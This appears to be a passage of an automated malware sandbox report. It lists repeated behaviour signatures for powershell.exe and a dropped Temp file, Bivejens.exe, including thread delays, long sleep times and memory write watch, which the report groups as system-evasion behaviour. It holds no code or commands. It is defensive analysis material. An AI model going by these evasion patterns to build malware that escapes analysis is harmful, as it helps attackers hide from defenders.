        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeAPI/Special instruction interceptor: Address: 1E95153
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeMemory allocated: 1E6C0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeMemory allocated: 1E570000 memory reserve | memory write watchJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 600000Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 599875Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 599766Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 599657Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 599532Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 599422Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 599313Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 599188Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 599063Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 598938Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 598813Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 598703Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 598594Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 598469Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 598360Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 598235Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 598110Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 597985Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 597860Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 597735Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 597610Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 597485Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 597360Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 597235Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 597110Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 596985Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 596860Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 596735Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 596610Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 596485Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 596360Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 596235Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 596110Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 595985Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 595860Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 595735Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 595610Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 595485Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 595360Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 595235Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 595110Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 594985Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 594851Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 594749Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 594626Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 594431Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 594250Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 594141Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 594016Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 593891Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 593782Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 593657Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7186Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2514Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeWindow / User API: threadDelayed 2063Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeWindow / User API: threadDelayed 7741Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeAPI coverage: 1.9 %
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7584Thread sleep time: -8301034833169293s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -26747778906878833s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -600000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 6736Thread sleep count: 2063 > 30Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -599875s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 6736Thread sleep count: 7741 > 30Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -599766s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -599657s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep count: 31 > 30Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -599532s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -599422s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -599313s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -599188s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -599063s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -598938s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -598813s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -598703s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -598594s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -598469s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -598360s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -598235s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -598110s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -597985s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -597860s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -597735s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -597610s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -597485s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -597360s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -597235s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -597110s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -596985s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -596860s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -596735s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -596610s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -596485s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -596360s >= -30000sJump to behavior
